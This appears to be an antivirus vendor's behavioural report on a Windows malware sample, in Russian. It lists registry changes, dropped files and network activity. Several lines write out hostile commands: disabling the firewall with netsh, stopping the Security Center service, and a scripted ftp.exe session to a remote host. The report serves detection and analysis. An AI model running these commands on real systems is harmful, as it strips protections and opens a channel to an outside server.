Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
- C:\config.exe
- C:\client.exe
- <SYSTEM32>\ftp.exe -s:ftp.txt ftp.freestyle.netii.net
- <SYSTEM32>\netsh.exe firewall set opmode disable
- <SYSTEM32>\sc.exe stop wscsvc sc config wscsvc start=demand
- C:\mswinsck.ocx
- C:\client.exe
- %HOMEPATH%\ftp.txt
- %TEMP%\a49188.bat
- <LS_APPDATA>\client.exe
- <LS_APPDATA>\config.exe
- <LS_APPDATA>\mswinsck.ocx
- C:\config.exe
- %TEMP%\a65123.bat
- %TEMP%\a49188.bat
- %TEMP%\a65123.bat
- <LS_APPDATA>\client.exe
- <LS_APPDATA>\mswinsck.ocx
- %TEMP%\a65123.bat
- <LS_APPDATA>\config.exe
- 'localhost':1038
- 'ft#.###estyle.netii.net':21
- DNS ASK ft#.###estyle.netii.net
- '<IP-адрес в локальной сети>':1036
- ClassName: 'Shell_TrayWnd' WindowName: ''